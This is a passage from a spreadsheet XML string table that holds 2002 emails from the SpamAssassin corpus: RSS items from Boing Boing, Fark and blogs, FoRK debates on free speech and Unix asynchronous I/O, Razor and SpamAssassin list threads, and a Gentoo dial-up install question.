    <t>URL: [URL]http://www.newsisfree.com[/URL],8423196,1717/\nDate: 2002-10-01T08:34:09+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([NCBuy])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:01 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:01 -0000</t>
  </si>
  <si>
    <t>Cops sabotaging their own in car video cameras to avoid looking</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8423193,1717/\nDate: 2002-10-01T08:34:12+01:00\n\n(katu)</t>
  </si>
  <si>
    <t>Photoshop Sean Connery giving us some good advice</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8424916,1717/\nDate: 2002-10-01T09:35:15+01:00\n\n(Local Library)</t>
  </si>
  <si>
    <t>Show-and-tell nearly extinct because it might hurt children's</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8423194,1717/\nDate: 2002-10-01T08:34:11+01:00\n\n(St. Petersburg Times)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:01:00 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:01:00 -0000</t>
  </si>
  <si>
    <t>"I meditated in a cave for 12 years and now I'm here to tell you</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8424915,1717/\nDate: 2002-10-01T09:35:16+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Salon])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:34 -0000</t>
  </si>
  <si>
    <t>Automotive software Easter Egg discovered</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nSlashdot's reporting that according to the current ish of Popular Science, an \nEaster Egg has been discovered in the transmission control software for the BMW \nM3: \n\n    ...the proper combination of commands to the electronically controlled \n    manual transmission will cause the car to rev up to 4000rpm and drop the \n    clutch... \n\nAre we sure that this is a feature and not a bug? Link[1] Discuss[2]\n\n[1] [URL]http://slashdot.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>Disney's no-good Park-Czar replaced</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDisney has named a new president of Walt Disney Parks, replacing Paul Pressler, \nthe exec who did his damnedest to ruin Disneyland, slashing spending (at the \nexpense of safety and employee satisfaction), building the craptastical \nCalifornia Adventure, reducing the number of SKUs available for sale in the \nPark stores, and so on. The new president, James Rasulo, used to be head of \nEuro Disney. Link[1] Discuss[2]\n\n[1] [URL]http://reuters.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://reuters.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Dan Gillmor responds to Jack Valenti</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDan Gillmor interviewed Jack Valenti[1] last week in his column and did the \nimpartial thing, representing Valenti's beliefs as fairly as possible. This \nweek, Dan takes Valenti's arguments apart, looking at what Hollywood's agenda \nreally entails: \n\n    So the movie and music companies are going back to Congress for another \n    helping. They are asking for laws that would force technology innovators to \n    restrict the capabilities of devices -- cripple PCs and other machines that \n    communicate so they can't make copies the copyright holders don't \n    explicitly allow. Amazingly, the entertainment industry also wants \n    permission to hack into networks and machines they believe are being used \n    to violate copyrights. \n\n    Here is what it all means. To protect a business model and thwart even the \n    possibility of infringement, the cartel wants technology companies to ask \n    permission before they can innovate. The media giants want to keep \n    information flow centralized, to control the new medium as if it's nothing \n    but a jazzed-up television. Instead of accepting, as they do today, that a \n    certain amount of penny-ante infringement will occur and then going after \n    the major-league pirates, they call every act of infringement -- and some \n    things that aren't infringement at all -- an act of piracy or stealing. \n    Saying it doesn't make it so.  \n\nLink[2] Discuss[3]\n\n[1] [URL]http://www.siliconvalley.com[/URL]\n[2] [URL]http://www.siliconvalley.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.siliconvalley.com http://www.siliconvalley.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>2000+ year old Greek computer reinterpreted</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe Antikythera mechanism, recovered off a sunken ship in Greece in 1900, is \nthought to be a clockwork device to calculate the orbits of the celestial \nbodies. New analysis of the remaining fragments shows that it was wicked-cool: \n\n    The Greeks believed in an earth-centric universe and accounted for \n    celestial bodies' motions using elaborate models based on epicycles, in \n    which each body describes a circle (the epicycle) around a point that \n    itself moves in a circle around the earth. Mr Wright found evidence that \n    the Antikythera mechanism would have been able to reproduce the motions of \n    the sun and moon accurately, using an epicyclic model devised by \n    Hipparchus, and of the planets Mercury and Venus, using an epicyclic model \n    derived by Apollonius of Perga. (These models, which predate the mechanism, \n    were subsequently incorporated into the work of Claudius Ptolemy in the \n    second century AD.) \n\n    A device that just modelled the motions of the sun, moon, Mercury and Venus \n    does not make much sense. But if an upper layer of mechanism had been \n    built, and lost, these extra gears could have modelled the motions of the \n    three other planets known at the timeMars, Jupiter and Saturn. In other \n    words, the device may have been able to predict the positions of the known \n    celestial bodies for any given date with a respectable degree of accuracy, \n    using bronze pointers on a circular dial with the constellations of the \n    zodiac running round its edge.  \n\nLink[1] Discuss[2] (_Thanks, Mark!_)\n\n[1] [URL]http://www.economist.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.economist.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:15 -0000</t>
  </si>
  <si>
    <t>Quickly</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-30T00:33:14-06:00\n\nAnyone have a copy of Bell Centennial I can borrow? I wonder if I'll ever have \n$100 to spend on fonts. (Matthew Carter, I'd be happy to pay you the two cents \nin royalties you probably get for selling $100 worth of fonts.) \n\n*Update:* Kevin Marks[1], who is stupendously incredible for far more things \nthan I can list here points out that Gill Sans (which I was asking for earlier) \nis _included with OS X_. I knew Mac OS X included a lot of great fonts[2], but \nI don't know how I overlooked this. _Awesome!_ \n\nTufte notes: Terrie Miller[3]. \n\nFirst ammendement beer bash. \n\niSync Beta[4] (guess they learned a lesson from iCal) is out.\n\n\n\n[1] [URL]http://epeus.blogspot.com[/URL]\n[2] [URL]http://www.apple.com[/URL]\n[3] [URL]http://www.oreillynet.com[/URL]\n[4] [URL]http://www.apple.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://epeus.blogspot.com http://www.apple.com http://www.oreillynet.com http://www.apple.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:14 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:14 -0000</t>
  </si>
  <si>
    <t>curb your celebrity</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-09-30T17:28:45-06:00\n\nAaron Warchalker will probably be on Public Radio's Marketplace tomorrow \nevening. I tried to cut down on the number of "you know"s but I didn't do too \nwell. :-( I'll keep trying.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:06 -0000</t>
  </si>
  <si>
    <t>Wedding etiquette</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-30T12:16:54-05:00\n\n_Margaret Berry_: Don't Be Rude: Part IV, Weddings[1]. &amp;#8220;There's a lot of \nroom for error with invitations. It's helpful to think of them as petite social \nlandmines with quaint wax seals.&amp;#8221;\n\n\n\n[1] [URL]http://www.themorningnews.org[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.themorningnews.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:05 -0000</t>
  </si>
  <si>
    <t>I mean why not</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-01T00:06:36-05:00\n\n_Kevin Fanning_: Hallmark vs. Successories[1]. &amp;#8220;At Successories you were \nmostly left alone. There'd be brainstorm meetings to come up with new topics to \ntackle ("Howsabout 'Diligence'?" "No I think we did that one already, didn't \nwe?") but mostly you could just hang around, bang away at whatever ideas you \nhad, show your manager what you were working on, and he/she'd give you \nfeedback, encouragement, tell you to keep at it, point to the poster of \nStick-to-it-iveness on their wall (Yes, we had our own brand of Successories \nposters hanging everywhere. I mean why not.) and give you the thumbs up.&amp;#8221;\n\n\n\n[1] [URL]http://www.whygodwhy.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.whygodwhy.com</t>
  </si>
  <si>
    <t>Un</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-30T23:57:43-05:00\n\n_Paul Ford_: East River Unconsecration[1]. &amp;#8220;There are a lot of hearts \nunder the East River, and it took a long time for it to find mine.&amp;#8221;\n\n\n\n[1] [URL]http://ftrain.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://ftrain.com</t>
  </si>
  <si>
    <t>Best</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-30T16:06:50-05:00\n\n_Heather Hamilton_: Very Best of the World's Worst[1]. &amp;#8220;After watching \nlast night's premiere of "The Very Best of the World's Worst Drivers: 2" I \ntried to figure out what it was about these very best worst drivers that made \nthem the very best, but not really _the_ very best, because if they really were \n_the_ very best, wouldn't they have been featured on "The Very Best of the \nWorld's Worst Drivers: 1" ?&amp;#8221;\n\n\n\n[1] [URL]http://www.dooce.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.dooce.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 01 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Colophon 1</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-01T00:11:05-05:00\n\n_Jason Gurley_: Rap Sheet[1]. &amp;#8220;I once played drums in a band with no name \nthat never played a single gig anywhere.&amp;#8221;\n\n\n\n[1] [URL]http://www.deeplyshallow.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.deeplyshallow.com</t>
  </si>
  <si>
    <t>Colophon 2</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-01T00:22:28-05:00\n\n_Heather Hamilton_: About[1]. &amp;#8220;I am that girl.&amp;#8221;\n\n\n\n[1] [URL]http://www.dooce.com[/URL]</t>
  </si>
  <si>
    <t>Colophon 3</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-01T00:23:58-05:00\n\n_Dean Allen_: About the author[1]. &amp;#8220;The funniest thing Dean has ever \nwitnessed was some footage of narcoleptic dogs in a Nova documentary on sleep \ndisorders.&amp;#8221;\n\n\n\n[1] [URL]http://www.textism.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.textism.com</t>
  </si>
  <si>
    <t>To: FoRK &lt;fork@spamassassin.taint.org&gt;\nFrom: Gregory Alan Bolcer &lt;gbolcer@endeavors.com&gt;\nDate: Tue, 01 Oct 2002 07:07:19 -0700</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 07:07:19 -0700</t>
  </si>
  <si>
    <t>Re: A moment of silence for the First Amendment &amp; Angry Liberal Yutes</t>
  </si>
  <si>
    <t>Russell Turpin wrote:\n&gt; \n&gt; Gregory Alan Bolcer:\n&gt; &gt;I'm not sure since I haven't attended civics class\n&gt; &gt;in quite some time, but the First Amendment doesn't cover protected speech,\n&gt; &gt;hate speech, or actions. ..\n&gt; \n&gt; The first two are wrong. The first amendment DOES\n&gt; protect speech the Supreme Court decides it protects\n&gt; (duh!), and that happens to include most of what\n&gt; people consider hate speech. Unlike many other\n&gt; nations, the US has no laws against hate speech, per\n&gt; se. And the first amendment is the reason for that.\n&gt; \n\n\nThis was poking fun of the practice of making\nup differnt types of speech with different\ntypes of protected status.  I think the\nlaws specialing out hate and protected speech\nare ridiculous.  The point I keep trying to make\nis that there's only two types, speech and action. \nI agree, they are all speech and should be \ncovered by the First Amendment, but\n\nIf hate speech is so protected, why are certain\nstates trying to prosecute people for it?  There's\nonly two answers and one of them is wrong.\n\n  1) Because hate speech is different and needs to\n     have a different level of protection dictated\n     by whoever's offended at the time.\n  2) It's because it's not just speech, but action.\n     A action who's consequences are foreseeable by \n     any reasonable person. \n\nHate speech is mislabeled.  It's really "threat".  I think\nthey let the mislabeling perpetuate as there's advantage\nin being able to counter-threat with loss of liberty and\nmoney through civil and criminal lawsuits for people THEY\ndon't like.  \n\n\nGreg\n\n\n\n&gt; _________________________________________________________________\n&gt; Join the world?s largest e-mail service with MSN Hotmail.\n&gt; [URL]http://www.hotmail.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Tue, 01 Oct 2002 06:18:53 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 06:18:53 +0000</t>
  </si>
  <si>
    <t>use new apt to do null to RH8 upgrade?</t>
  </si>
  <si>
    <t>Is it possible to use new apt to do (null) to RH8 upgrade? Even if it's possible, are there good reasons why maybe I should not do it and just use the RH iso's (I don't think RH8 will upgrade from (null), maybe up2date will)? -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Fork@xent.com\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Tue, 01 Oct 2002 04:31:01 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 04:31:01 +0000</t>
  </si>
  <si>
    <t>Gregory Alan Bolcer:\n&gt;I'm not sure since I haven't attended civics class\n&gt;in quite some time, but the First Amendment doesn't cover protected speech, \n&gt;hate speech, or actions. ..\n\nThe first two are wrong. The first amendment DOES\nprotect speech the Supreme Court decides it protects\n(duh!), and that happens to include most of what\npeople consider hate speech. Unlike many other\nnations, the US has no laws against hate speech, per\nse. And the first amendment is the reason for that.\n\n\n\n\n_________________________________________________________________\nJoin the worlds largest e-mail service with MSN Hotmail. \n[URL]http://www.hotmail.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 01 Oct 2002 02:00:34 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 02:00:34 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-01</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (23-29 September 2002)\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (23-29 September 2002)                  |\n|   posted by rafael on Monday September 30, @17:26 (summaries)      |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nThis was a nice week, with lots of discussion, on various interesting\ntopics. Read on for strange bugs, strange fixes, strange error messages,\nand as always, the ongoing efforts made to improve Perl 5.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.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yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 01 Oct 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 02:00:25 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-10-01</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (23-29 September 2002)\n    posted by rafael on Monday September 30, @17:26 (summarie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spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Tue,  8 Oct 2002 04:16:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue,  8 Oct 2002 04:16:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 1075] RPM build puts wrong path in the *.cf files</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\nspamassassin-contrib@msquadrat.de changed:\n\n           What    |Removed                     |Added\n----------------------------------------------------------------------------\n                 CC|                            |spamassassin-\n                   |                            |devel@lists.sourceforge.net\n         AssignedTo|spamassassin-               |spamassassin-\n                   |devel@lists.sourceforge.net |contrib@msquadrat.de\n\n\n\n------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-08 04:16 -------\nI'm gonna fix this one. I think the best solution will be to copy the modified \nrules to blib and install them from there. Then the rules files will be \nchanged on build time and not install time, too. \n\n\n\n------- You are receiving this mail because: -------\nYou are the assignee for the bug, or are watching the assignee.\nYou are on the CC list for the bug, or are watching someone who is.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.hughes-family.org http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: kragen@pobox.com (Kragen Sitaker)\nDate: Tue,  3 Sep 2002 18:17:30 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue,  3 Sep 2002 18:17:30 -0400 (EDT)</t>
  </si>
  <si>
    <t>kragen@pobox.com (Kragen Sitaker)</t>
  </si>
  <si>
    <t>asynchronous I/O (was Re: Gasp!)</t>
  </si>
  <si>
    <t>Of course we've had select() since BSD 4.2 and poll() since System V or so, and they work reasonably well for asynchronous I/O up to a hundred or so channels, but suck after that; /dev/poll (available in Solaris and Linux) is one approach to solving this; Linux has a way to do essentially the same thing with real-time signals, and has for years; and FreeBSD has kqueue. More details about these are at [URL]http://www.citi.umich.edu[/URL] None of this helps with disk I/O; most programs that need to overlap disk I/O with computation, on either proprietary Unixes or Linux, just use multiple threads or processes to handle the disk I/O. POSIX specifies a mechanism for nonblocking disk I/O that most proprietary Unixes implement.  The Linux kernel hackers are currently rewriting Linux's entire I/O subsystem essentially from scratch to work asynchronously, because they can easily build efficient synchronous I/O primitives from asynchronous ones, but not the other way around. So now Linux will support this mechanism too. It probably doesn't need saying for anyone who's read Beberg saying things like "Memory management is a non-issue for anyone that has any idea at all how the hardware functions," but he's totally off-base. People should know by now not to take anything he says seriously, but apparently some don't, so I'll rebut. Not surprisingly, the rebuttal requires many more words than the original stupid errors. In detail, he wrote: &gt; Could it be? After 20 years without this feature UNIX finally &gt; catches up to Windows and has I/O that doesnt [sic] totally suck for &gt; nontrivial apps? No way! Unix acquired nonblocking I/O in the form of select() about 23 years ago, and Solaris has had the particular aio_* calls we are discussing for many years.  Very few applications need the aio_* calls --- essentially only high-performance RDBMS servers even benefit from them at all, and most of those have been faking it fine for a while with multiple threads or processes.  This just provides a modicum of extra performance. &gt; OK, so they do it with signals or a flag, which is completely &gt; ghetto, but at least they are trying. Keep trying guys, you got the &gt; idea, but not the clue. Readers can judge who lacks the clue here. &gt; The Windows I/O model does definately [sic] blow the doors off the &gt; UNIX one, but then they had select to point at in it's [sic] &gt; suckiness and anything would have been an improvement. UNIX is just &gt; now looking at it's [sic] I/O model and adapting to a multiprocess &gt; multithreaded world so it's gonna be years yet before a posix API &gt; comes out of it. Although I don't have a copy of the spec handy, I think the aio_* APIs come from the POSIX spec IEEE Std 1003.1-1990, section 6.7.9, which is 13 years old, and which I think documented then-current practice. They might be even older than that. Unix has been multiprocess since 1969, and most Unix implementations have supported multithreading for a decade or more. &gt; Bottom line is the "do stuff when something happens" model turned &gt; out to be right, and the UNIX "look for something to do and keep &gt; looking till you find it no matter how many times you have to look" &gt; is not really working so great anymore. Linux's aio_* routines can notify the process of their completion with a "signal", a feature missing in Microsoft Windows; a "signal" causes the immediate execution of a "signal handler" in a process.  By contrast, the Microsoft Windows mechanisms to do similar things (such as completion ports) do not deliver a notification until the process polls them. I don't think signals are a better way to do things in this case (although I haven't written any RDBMSes myself), but you got the technical descriptions of the two operating systems exactly backwards. Most programs that use Linux real-time signals for asynchronous network I/O, in fact, block the signal in question and poll the signal queue in a very Windowsish way, using sigtimedwait() or sigwaitinfo(). --         Kragen Sitaker      Edsger Wybe Dijkstra died in August of 2002.  This is a terrible loss after  which the world will never be the same. [URL]http://www.xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.citi.umich.edu http://www.xent.com</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "Michael Moncur" &lt;mgm@starlingtech.com&gt;\nDate: Thu, 8 Aug 2002 22:56:37 -0600</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 22:56:37 -0600</t>
  </si>
  <si>
    <t>RE: [SAtalk] How'd this one slip through?</t>
  </si>
  <si>
    <t>&gt; Ouch ;-)  Although I'm not ready to give up razor just yet, I'd like to\n&gt; see a pyzor check in SA.  I don't think it even needs to be written in\n&gt; perl.  SA is actually calling razor-check and razor-report as well as\n&gt; dccproc for those checks so it should be nothing more than duplication\n&gt; of coding to add pyzor.\n\nI don't know from Pyzor, but I've always thought that the way services like\nRazor and DCC could be truly useful is if there were a bunch of different\nones. We can assign them scores based on how trustworthy each one is, and\nwhen a message is listed in multiple services you can pretty much trust that\nit's spam.\n\n--\nMichael Moncur  mgm at starlingtech.com  [URL]http://www.starlingtech.com[/URL]\n"Mustard's no good without roast beef." --Chico Marx\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.starlingtech.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Thu, 8 Aug 2002 22:24:32 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 22:24:32 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] Gentoo Linux</t>
  </si>
  <si>
    <t>Mark Page  printfd APOLOGIES IN ADVANCE FOR 80 CHAR LINES IN WEB MAIL (will get a mail client for this soon, honest) &gt; Has anybody on the list installed/used this distro? If so wouldn't mind a bit  &gt; of help. &gt;  &gt;  Burnt the ISO's from the latest Linux Format magazine. Took a couple of  &gt; attempts to install but got there. My problem - I have a standard dial-up  &gt; modem and the installation gives you the network card setup so internet  &gt; download is out of the question, but, I installed the Stage3 tarball which  &gt; puts the .tgz files on your harddrive.  &gt;  &gt;  So methinks, I have the software there and all I need to do is install so as  &gt; 1) get the necessary programmes to connect to the net and 2) install any  &gt; other programmes I might need. &gt;  &gt;  What actually happens is that if, for example, I attempt to install the KDE  &gt; package, the system goes looking for any dependencies on the net despite the  &gt; fact that the dependencies reside on my hard drive. Obviously I can't install  &gt; anything. &gt;  &gt;  Have checked all docs on the web page and nothing deals with a standard  &gt; dial-up modem or how to tell the package manager to look for the dependencies  &gt; on the hard drive. &gt;  &gt;  Anybody able to help me here? &gt;  &gt;  Thanks in anticipation. Yup I'm running it on my k6 233 laptop. It's tres sweet. I would recommend getting wvdial, opening a virtual terminal dialing the internet and then emerging the packages you need. I did my install over my home lan and the lan in work (which has DSL - running Linux as firewall/router/mailserver of course). But yes you will need at least wvdial to make this puppy happen me thinks. In fact it looks as if the base install comes with wvdial for just this kind of instal. But I just found this on the Gentoo site for you. [URL]http://forums.gentoo.org[/URL] Specifically quote: If it is not too obvious, these are the steps I took.     * Boot off the install CD     * modprobe serial     * setserial (if needed)     * create mount point for other distribution     * mount other distribution     * chroot'd to other distribution     * su - to regular user     * ran wvdial     * switch consoles and install as normal And yes I do give better technical support to people who use distros I like. I'm only laughing on the outside  My smile is just skin deep  If you could see inside I'm really crying  You might join me for a weep. &lt;&gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://forums.gentoo.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nDate: Thu, 8 Aug 2002 21:39:09 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 21:39:09 -0400</t>
  </si>
  <si>
    <t>On Fri, Aug 09, 2002 at 10:05:29AM +1000, Adam Goryachev  is thought to have said: &gt; &gt; Now I get some opt-in mail which looks to me like &gt; &gt; spam.  I hit "this is spam".  My trust rating plummets -- &gt;  &gt; Good! Your opinion of what is spam is unreliable, and therefore, I don't &gt; *want* to trust you. IMHO, that is exactly the case that the trust system is &gt; supposed to sort out. People who incorrectly submit non-spam bulk mail to &gt; razor. Let's take a look at an example here. Someone on this list signed razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm subscriptions in a piss-poor attempt to mailbomb me. I report all of these mailings to Razor because, guess what, for me this is spam. This and a hundred more traditional spam emails to automated spamtrap addresses get  reported by me daily. I probably have a decent TES value because of all of this. Now lets say someone else who is also reporting a fair amount of your typical proxy/relayed spam has been reporting these and has built up a decent TES rating because of it. However they subscribed to that same ZDNet list and enjoy getting the mail from it except that they don't like seeing  it tagged as spam by Razor. So they razor-revoke it.  Who loses in this case? Why? Neither party is inaccurate in their actions IMO. But someone's standing is going to get hurt because of it. Tabor --  -------------------------------------------------------------------- Tabor J. Wells                                razor-users@fsckit.net Fsck It!                 Just another victim of the ambient morality ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Mark Page &lt;mpage@esatclear.ie&gt;\nDate: Thu, 8 Aug 2002 20:36:54 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 20:36:54 +0100</t>
  </si>
  <si>
    <t>Mark Page &lt;mpage@esatclear.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Gentoo Linux</t>
  </si>
  <si>
    <t>Has anybody on the list installed/used this distro? If so wouldn't mind a bit \nof help.\n\n Burnt the ISO's from the latest Linux Format magazine. Took a couple of \nattempts to install but got there. My problem - I have a standard dial-up \nmodem and the installation gives you the network card setup so internet \ndownload is out of the question, but, I installed the Stage3 tarball which \nputs the .tgz files on your harddrive. \n\n So methinks, I have the software there and all I need to do is install so as \n1) get the necessary programmes to connect to the net and 2) install any \nother programmes I might need.\n\n What actually happens is that if, for example, I attempt to install the KDE \npackage, the system goes looking for any dependencies on the net despite the \nfact that the dependencies reside on my hard drive. Obviously I can't install \nanything.\n\n Have checked all docs on the web page and nothing deals with a standard \ndial-up modem or how to tell the package manager to look for the dependencies \non the hard drive.\n\n Anybody able to help me here?\n\n Thanks in anticipation.\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: kevin lyda &lt;kevin@ie.suberic.net&gt;\nFrom: Paul Jakma &lt;paulj@alphyra.ie&gt;\nDate: Thu, 8 Aug 2002 20:06:12 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 20:06:12 +0100 (IST)</t>
  </si>
  <si>
    <t>Paul Jakma &lt;paulj@alphyra.ie&gt;</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin@ie.suberic.net&gt;</t>
  </si>
  <si>
